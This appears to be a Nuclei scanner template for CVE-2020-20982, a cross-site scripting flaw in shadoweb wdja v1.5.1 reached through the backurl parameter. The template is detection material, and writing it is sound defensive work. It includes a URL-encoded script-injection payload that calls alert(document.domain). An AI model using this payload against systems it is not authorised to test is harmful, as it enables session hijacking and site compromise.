id: CVE-2020-20982 info: name: shadoweb wdja v1.5.1 - Cross-Site Scripting author: pikpikcu,ritikchaddha severity: critical description: shadoweb wdja v1.5.1 is susceptible to cross-site scripting because it allows attackers to execute arbitrary code and gain escalated privileges via the backurl parameter to /php/passport/index.php. impact: | Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: - https://github.com/shadoweb/wdja/issues/1 - https://nvd.nist.gov/vuln/detail/CVE-2020-20982 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H cvss-score: 9.6 cve-id: CVE-2020-20982 cwe-id: CWE-79 epss-score: 0.01894 epss-percentile: 0.87155 cpe: cpe:2.3:a:wdja:wdja_cms:1.5.1:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: wdja product: wdja_cms tags: cve,cve2020,xss,wdja,shadoweb http: - method: GET path: - "{{BaseURL}}/passport/index.php?action=manage&mtype=userset&backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" stop-at-first-match: true matchers-condition: and matchers: - type: word words: - "location.href='" condition: and - type: word part: header words: - 'text/html' - type: status status: - 200 # digest: 490a0046304402206b513d2c4b4bbd99338d11dfcba53f8f7639db09966a6679cb69d5b091afce9b02205f08f5de2b6030a8f0ff9bd147ad27fff07da3f112d018a6dd83df389c387647:922c64590222798bb761d5b6d8e72950